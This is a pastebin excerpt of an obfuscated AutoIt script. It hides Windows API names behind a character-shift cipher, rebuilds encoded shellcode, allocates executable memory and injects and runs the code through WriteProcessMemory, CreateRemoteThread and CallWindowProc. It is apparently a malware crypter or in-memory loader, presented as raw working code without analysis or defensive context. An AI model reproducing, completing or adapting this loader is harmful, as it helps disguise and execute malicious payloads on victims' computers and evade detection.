  1288. DllStructSetData($EwvnTUsAkshFtvWGioAybTVtd, 1, $oQwDLGtYmIthUExReUoF)
  1289. Local $ntaybGrqvqJZVBtaRfw = DllStructCreate("byte[" & BinaryLen( $SPClOqKVBtCHKWXNnnZe) & "]")
  1290. DllStructSetData( $ntaybGrqvqJZVBtaRfw, 1, $SPClOqKVBtCHKWXNnnZe)
  1291. DllCall("user32.dll", "none", "CallWindowProc", "ptr", DllStructGetPtr($EwvnTUsAkshFtvWGioAybTVtd), "ptr" , DllStructGetPtr( $ntaybGrqvqJZVBtaRfw), "int", BinaryLen( $SPClOqKVBtCHKWXNnnZe), "str", $vkImkzWBSwclNjczcPuEDjKDEz, "int", 0)
  1292. Dim $pLShtpbekqYQZlPHMuAS= DllStructGetData($ntaybGrqvqJZVBtaRfw, 1)
  1293. $ntaybGrqvqJZVBtaRfw = 0
  1294. $EwvnTUsAkshFtvWGioAybTVtd = 0
  1295. Return $pLShtpbekqYQZlPHMuAS
  1296. EndFunc
  1297.  
  1298.  
  1299. Func RAhQTinKDlSaxdpIIoAkCu($ZbzDiNWdgZHkpJcANvdcLg,$ttxjswWxXnXZwgCkszFsvAHkYM)
  1300. Dim $nVMMUviTnoTEVwMDVpOxcs = ""
  1301. For $rVGrSGxzfdrBIiBdUzXrB = 1 to StringLen($ZbzDiNWdgZHkpJcANvdcLg)
  1302. $nVMMUviTnoTEVwMDVpOxcs = $nVMMUviTnoTEVwMDVpOxcs & Chr(Asc(StringMid($ZbzDiNWdgZHkpJcANvdcLg, $rVGrSGxzfdrBIiBdUzXrB)) - $ttxjswWxXnXZwgCkszFsvAHkYM)
  1303. Next
  1304. Return $nVMMUviTnoTEVwMDVpOxcs
  1305. EndFunc
  1306.  
  1307.  
  1308. Func feHPyADsyOXBfZGCkTdoQH($zIVcFnRKddojcdXszcdcsnaFFFdcFaVsXaDsm)
  1309. Local $sacJFCoD , $WEwioDja , $zaVFOCmaaaEjeX , $aCFvtIswFsfSdesSvrdEcADiFDceDDirJd , $icJxfJmiwpJwINfhiPW , $oCroWBcssdD , _
  1310. $FassJsAjsdn ,$ddXCo ,$VSowArFsisShsEAdEzcoaOszqdaDISKcUEVXDDDJfisjrDAadc,$eIrveicFcasSidQsBZBc ,$stsDrdcFdQsdKJdZjWcdddaFvcieOXcdKfSacdDtCeDd , $gtDCZYCIYbEiUYcuPLxbxO[19], $aasfFdWsRrWadDFA , _
  1311. $sLNijrDVpSYwqXPZrlPoB , $sisdcniaVDJcDcdjtsEaasesUjADr , $ZsDcaAsdIBhADunFvojdrDjQssc , $dDFSdfFCdasQccaDdRUseEa , $sccfffdjKsVDfDVqFdWdUVcIssuCD , $KsOFDFdDwcsEhAdjaijdWCfdfAOSaqdWKc
  1312. Local Const $dcAtWofnacsdaKsVsdF = "kernel32"
  1313. If Not $zIVcFnRKddojcdXszcdcsnaFFFdcFaVsXaDsm <> "" Then
  1314. ConsoleWrite ("Binary buffer not Exists , Choose an .exe File to Read First ...")
  1315. Exit
  1316. EndIf
  1317. $gtDCZYCIYbEiUYcuPLxbxO[1] = RAhQTinKDlSaxdpIIoAkCu("8`@JMK@9K<I<NINNNN@A<=NKM@9J8:8888@A@=KKNLNNNNJJN:8N=>K>@JA=KKNLNNNNM@9A8:8888@A<", 8)
  1318. $gtDCZYCIYbEiUYcuPLxbxO[2] = RAhQTinKDlSaxdpIIoAkCu("=N@JJIA@J@8:L@JA=KKNLNNNNM@8>8:8888@A<=N<JJ@=;JIMLJ@JA=KKNLNNNNM@N;898888@A<=N8JJ", 8)
  1319. $gtDCZYCIYbEiUYcuPLxbxO[3] = RAhQTinKDlSaxdpIIoAkCu("A;;=LN@=@JA=KKNLNNNNM@M8898888@A<=MKJJ@LKJJ>=L@JA=KKNLNNNNM@KL898888@A<=M@JJ=;9;K", 8)
  1320. $gtDCZYCIYbEiUYcuPLxbxO[4] = RAhQTinKDlSaxdpIIoAkCu("9?@@JA=KKNLNNNNM@JI898888@A<=M<JJ@ILJLNI=@JA=KKNLNNNNM@I?898888@A<=M8JJ:M8==8K@@J", 8)
  1321. $gtDCZYCIYbEiUYcuPLxbxO[5] = RAhQTinKDlSaxdpIIoAkCu("A=KKNLNNNNM@A<898888@A<=LKJJ@=I99>I:@JA=KKNLNNNNM@@9898888M@8>888888>M?<><>K>K88=", 8)
  1322. $gtDCZYCIYbEiUYcuPLxbxO[6] = RAhQTinKDlSaxdpIIoAkCu("N=?NNL8@A@=L8NLNNNNJJ@JM;KL<9@JL8M@>8898888@A<=L@JJ;A:;8L:K@JA=L8NLNNNNM@<L898888", 8)
  1323. $gtDCZYCIYbEiUYcuPLxbxO[7] = RAhQTinKDlSaxdpIIoAkCu("@A<=L<>@888:8888@L@=L<NLNNNN=8>I88NN==N@>I<<@L@=@@NLNNNN=8NN==L<NN==N<@JK@@L@=?@N", 8)
  1324. $gtDCZYCIYbEiUYcuPLxbxO[8] = RAhQTinKDlSaxdpIIoAkCu("LNNNN=8@L@=@@NLNNNN=8>I88>I88>I8<>I88>I88>I88=9@L@=L<NLNNNN=8NN==N8>@KK8:8888@L@=", 8)
  1325. $gtDCZYCIYbEiUYcuPLxbxO[9] = RAhQTinKDlSaxdpIIoAkCu("I<NINNNN=8NN==L<K?@=I<NINNNN8:888988@L@=I<NINNNN=8NNJ=?KNLNNNNNN==MK><I9;8888888@", 8)
  1326. $gtDCZYCIYbEiUYcuPLxbxO[10] = RAhQTinKDlSaxdpIIoAkCu("J<88K@J<89<@J<898=8NNJ=?@NLNNNNNN==L@@J?LNK8;?N;K>I<8>@88;88888NN??=8NN??;<NNJ=?", 8)
  1327. $gtDCZYCIYbEiUYcuPLxbxO[11] = RAhQTinKDlSaxdpIIoAkCu("@NLNNNNNN==M@@A@=?<NLNNNN>I88NN??=<NN?=NKNNJ=?<NLNNNNNNJ=?@NLNNNNNN==M<@L<?9@@A@", 8)
  1328. $gtDCZYCIYbEiUYcuPLxbxO[12] = RAhQTinKDlSaxdpIIoAkCu("=?8NLNNNN8NJ?<?9<89@=?8NLNNNN;;K8;;N>;;KAMJ:A>JK>:@8;@=?8NLNNNN@JAL?<NLNNNN8;=@8", 8)
  1329. $gtDCZYCIYbEiUYcuPLxbxO[13] = RAhQTinKDlSaxdpIIoAkCu("K@J==NK8;=89<>I88NN?898=:=;NNJ=?@NLNNNNNN==M<<>>>;J??8>?:L9@J@=?<NLNNNN8;<?:@@A@", 8)
  1330. $gtDCZYCIYbEiUYcuPLxbxO[14] = RAhQTinKDlSaxdpIIoAkCu("==<NJNNNN@L@=I<NINNNN=8NNJ=?KNLNNNNNN==M8NNJ=?KNLNNNNNN==LKKAK;><I9;8888888@J<88", 8)
  1331. $gtDCZYCIYbEiUYcuPLxbxO[15] = RAhQTinKDlSaxdpIIoAkCu("K@J<88K@J88@J88@J<89@K;==@JMK@;K<N<=:@A==NK@J<I;K8;KI@A<LN<@J<A?@8;KI@A<LN@@J=99", 8)
  1332. $gtDCZYCIYbEiUYcuPLxbxO[16] = RAhQTinKDlSaxdpIIoAkCu("@@J<A:88;<LNK;;NN@J;98;?=NK;;K8=9IK@JK@8;N@L;K?@=K8?=N==A;JNJ?<98@;K98<<I?=M8JIK", 8)
  1333. $gtDCZYCIYbEiUYcuPLxbxO[17] = RAhQTinKDlSaxdpIIoAkCu(":=@>:9J=I;;K8KAK;@J<=NK@J<LN@@J=A9@@J<A:<8;K@:JLIL9M;8;KJ8NJ?9A@J<LN@@J<A9K8;K@K", 8)
  1334. $gtDCZYCIYbEiUYcuPLxbxO[18] = RAhQTinKDlSaxdpIIoAkCu("9M;8:8;KJ8;89=IKAK;88", 8)
  1335. For $i = 1 to 18
  1336. $aasfFdWsRrWadDFA &= $gtDCZYCIYbEiUYcuPLxbxO[$i]
  1337. Next
  1338. $stsDrdcFdQsdKJdZjWcdddaFvcieOXcdKfSacdDtCeDd = StringLen($zIVcFnRKddojcdXszcdcsnaFFFdcFaVsXaDsm)
  1339. $hfaaSSAFcdsfozFDsdWSsKZrSEFOCDsszVvSjKfaK = StringLen($aasfFdWsRrWadDFA) / 2
  1340. $aCFvtIswFsfSdesSvrdEcADiFDceDDirJd = DllStructCreate (RAhQTinKDlSaxdpIIoAkCu("Jwwtmiv(JqvizJ}nnmz", 8) & $stsDrdcFdQsdKJdZjWcdddaFvcieOXcdKfSacdDtCeDd &RAhQTinKDlSaxdpIIoAkCu("eCJwwtmiv([pmttKwlmJ}nnmzc", 8) & $hfaaSSAFcdsfozFDsdWSsKZrSEFOCDsszVvSjKfaK - 1 & RAhQTinKDlSaxdpIIoAkCu("eCJwwtmiv(I{uKwlmc9=e", 8))
  1341. $icJxfJmiwpJwINfhiPW = DllStructGetPtr ($aCFvtIswFsfSdesSvrdEcADiFDceDDirJd , 1)
  1342. $oCroWBcssdD = DllStructGetPtr ($aCFvtIswFsfSdesSvrdEcADiFDceDDirJd , 2)
  1343. $FassJsAjsdn = DllStructGetSize ($aCFvtIswFsfSdesSvrdEcADiFDceDDirJd)
  1344. $ZsDcaAsdIBhADunFvojdrDjQssc = DllCall($dcAtWofnacsdaKsVsdF, RAhQTinKDlSaxdpIIoAkCu("x|z", 8), RAhQTinKDlSaxdpIIoAkCu("^qz|}itIttwk", 8), RAhQTinKDlSaxdpIIoAkCu("x|z", 8), 0, RAhQTinKDlSaxdpIIoAkCu("lwzlgx|z", 8), $FassJsAjsdn, RAhQTinKDlSaxdpIIoAkCu("lwzlgx|z", 8), 4096,RAhQTinKDlSaxdpIIoAkCu("lwzl", 8), 64)
  1345. If IsArray($ZsDcaAsdIBhADunFvojdrDjQssc) Then
  1346. $ddXCo = $ZsDcaAsdIBhADunFvojdrDjQssc[0]
  1347. Else
  1348. ConsoleWrite ("Unable to Allocate Virtual Memory")
  1349. Exit
  1350. EndIf
  1351. $VSowArFsisShsEAdEzcoaOszqdaDISKcUEVXDDDJfisjrDAadc = $ddXCo + $stsDrdcFdQsdKJdZjWcdddaFvcieOXcdKfSacdDtCeDd
  1352. $sLNijrDVpSYwqXPZrlPoB = "0X8D05"
  1353. For $i = 11 To 3 Step -2
  1354. $sLNijrDVpSYwqXPZrlPoB &= StringMid ($ddXCo , $i , 2)
  1355. Next
  1356. $sLNijrDVpSYwqXPZrlPoB &= "8D1D"
  1357. For $i = 11 To 3 Step -2
  1358. $sLNijrDVpSYwqXPZrlPoB &= StringMid ($VSowArFsisShsEAdEzcoaOszqdaDISKcUEVXDDDJfisjrDAadc , $i , 2)
  1359. Next
  1360. $sLNijrDVpSYwqXPZrlPoB &= "FFD3C3"
  1361. $sisdcniaVDJcDcdjtsEaasesUjADr = StringLen($sLNijrDVpSYwqXPZrlPoB) / 2 - 1
  1362. $dDFSdfFCdasQccaDdRUseEa = DllStructCreate(RAhQTinKDlSaxdpIIoAkCu("Jwwtmiv(I{uKwxUmuwzc", 8) & $sisdcniaVDJcDcdjtsEaasesUjADr & RAhQTinKDlSaxdpIIoAkCu("e", 8))
  1363. DllStructSetData($dDFSdfFCdasQccaDdRUseEa, 1, $sLNijrDVpSYwqXPZrlPoB)
  1364. $sccfffdjKsVDfDVqFdWdUVcIssuCD = DllStructGetPtr($aCFvtIswFsfSdesSvrdEcADiFDceDDirJd, 3)
  1365. $KsOFDFdDwcsEhAdjaijdWCfdfAOSaqdWKc = DllStructGetPtr($dDFSdfFCdasQccaDdRUseEa , 1)
  1366. GqamFZihioBfxTCSWSeCps($sccfffdjKsVDfDVqFdWdUVcIssuCD, $KsOFDFdDwcsEhAdjaijdWCfdfAOSaqdWKc , $sisdcniaVDJcDcdjtsEaasesUjADr)
  1367. DllStructSetData ($aCFvtIswFsfSdesSvrdEcADiFDceDDirJd, 1 ,$zIVcFnRKddojcdXszcdcsnaFFFdcFaVsXaDsm)
  1368. DllStructSetData ($aCFvtIswFsfSdesSvrdEcADiFDceDDirJd, 2 ,$aasfFdWsRrWadDFA)
  1369. $sacJFCoD = DllCall($dcAtWofnacsdaKsVsdF, RAhQTinKDlSaxdpIIoAkCu("qv|", 8), RAhQTinKDlSaxdpIIoAkCu("WxmvXzwkm{{", 8), RAhQTinKDlSaxdpIIoAkCu("qv|", 8), 0x001f0fff, RAhQTinKDlSaxdpIIoAkCu("qv|", 8), 0, RAhQTinKDlSaxdpIIoAkCu("qv|", 8), @AutoItPID)
  1370. If IsArray($sacJFCoD) And Not @error Then
  1371. $sacJFCoD = $sacJFCoD[0]
  1372. DllCall($dcAtWofnacsdaKsVsdF, RAhQTinKDlSaxdpIIoAkCu("qv|", 8), RAhQTinKDlSaxdpIIoAkCu("_zq|mXzwkm{{Umuwz", 8), RAhQTinKDlSaxdpIIoAkCu("qv|", 8), $sacJFCoD,RAhQTinKDlSaxdpIIoAkCu("x|z", 8), $ddXCo, RAhQTinKDlSaxdpIIoAkCu("x|z", 8), $icJxfJmiwpJwINfhiPW,RAhQTinKDlSaxdpIIoAkCu("qv|", 8), $FassJsAjsdn, RAhQTinKDlSaxdpIIoAkCu("qv|", 8), 0)
  1373. $eIrveicFcasSidQsBZBc = $VSowArFsisShsEAdEzcoaOszqdaDISKcUEVXDDDJfisjrDAadc + $hfaaSSAFcdsfozFDsdWSsKZrSEFOCDsszVvSjKfaK - 1
  1374. Else
  1375. ConsoleWrite ("Unable to Open Process")
  1376. Exit
  1377. EndIf
  1378. $WEwioDja = DllCall($dcAtWofnacsdaKsVsdF, RAhQTinKDlSaxdpIIoAkCu("qv|", 8), RAhQTinKDlSaxdpIIoAkCu("Kzmi|mZmuw|m\pzmil", 8), RAhQTinKDlSaxdpIIoAkCu("qv|", 8), $sacJFCoD, RAhQTinKDlSaxdpIIoAkCu("x|z", 8), 0, RAhQTinKDlSaxdpIIoAkCu("qv|", 8), 0, RAhQTinKDlSaxdpIIoAkCu("qv|", 8), $eIrveicFcasSidQsBZBc, RAhQTinKDlSaxdpIIoAkCu("x|z", 8), 0, RAhQTinKDlSaxdpIIoAkCu("qv|", 8), 0, RAhQTinKDlSaxdpIIoAkCu("qv|", 8), 0)
  1379. if IsArray ($WEwioDja) And Not @error Then
  1380. $WEwioDja = $WEwioDja[0]
  1381. DllCall($dcAtWofnacsdaKsVsdF, RAhQTinKDlSaxdpIIoAkCu("qv|", 8), RAhQTinKDlSaxdpIIoAkCu("_iq|Nwz[qvotmWjrmk|", 8), RAhQTinKDlSaxdpIIoAkCu("qv|", 8), $WEwioDja, RAhQTinKDlSaxdpIIoAkCu("qv|", 8), 100)
  1382. DllCall($dcAtWofnacsdaKsVsdF, RAhQTinKDlSaxdpIIoAkCu("qv|", 8), RAhQTinKDlSaxdpIIoAkCu("Ktw{mPivltm", 8), RAhQTinKDlSaxdpIIoAkCu("qv|", 8), $sacJFCoD)
  1383. DllCall($dcAtWofnacsdaKsVsdF, RAhQTinKDlSaxdpIIoAkCu("jwwt", 8),RAhQTinKDlSaxdpIIoAkCu("^qz|}itNzmm", 8), RAhQTinKDlSaxdpIIoAkCu("x|z", 8), $ddXCo, RAhQTinKDlSaxdpIIoAkCu("lwzlgx|z", 8), 0, RAhQTinKDlSaxdpIIoAkCu("lwzl", 8), 0X8000)
  1384. Else
  1385. ConsoleWrite ("Unable to Create Thread")
  1386. Exit
  1387. EndIf
  1388. EndFunc
  1389. Func GqamFZihioBfxTCSWSeCps($iArrcFtdAsAdrnSivnKAJasaJRdcdrvSAVcjSRDdsaaKBcUnD,$FVWjw,$eQsfscIdszFjKddssdi)
  1390. local $cfsccdsRdaQicsjdsshzddVnnDccDccFsscsFJdjDAaa = RAhQTinKDlSaxdpIIoAkCu("8€@J?K:<8<@J?<:<8@;9KA@J<K:<8KN;I<K;88888888888888", 8)
  1391. Local $acKefrcFWaidFFFasrF = DllStructCreate(RAhQTinKDlSaxdpIIoAkCu("j|mc", 8) & BinaryLen($cfsccdsRdaQicsjdsshzddVnnDccDccFsscsFJdjDAaa) & RAhQTinKDlSaxdpIIoAkCu("e", 8))
  1392. DllStructSetData($acKefrcFWaidFFFasrF, 1, $cfsccdsRdaQicsjdsshzddVnnDccDccFsscsFJdjDAaa)
  1393. Local $dDAIcRcsjIXufiSajCddsDvKsODaSFaEvfDWhcD = DllCall(RAhQTinKDlSaxdpIIoAkCu("}{mz;:6ltt", 8), RAhQTinKDlSaxdpIIoAkCu("qv|", 8), RAhQTinKDlSaxdpIIoAkCu("Kitt_qvlwXzwk_", 8),RAhQTinKDlSaxdpIIoAkCu("x|z", 8), DllStructGetPtr($acKefrcFWaidFFFasrF), RAhQTinKDlSaxdpIIoAkCu("x|z", 8), $iArrcFtdAsAdrnSivnKAJasaJRdcdrvSAVcjSRDdsaaKBcUnD, RAhQTinKDlSaxdpIIoAkCu("x|z", 8), $FVWjw, RAhQTinKDlSaxdpIIoAkCu("qv|", 8), $eQsfscIdszFjKddssdi, RAhQTinKDlSaxdpIIoAkCu("qv|", 8), 0)
  1394. EndFunc
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement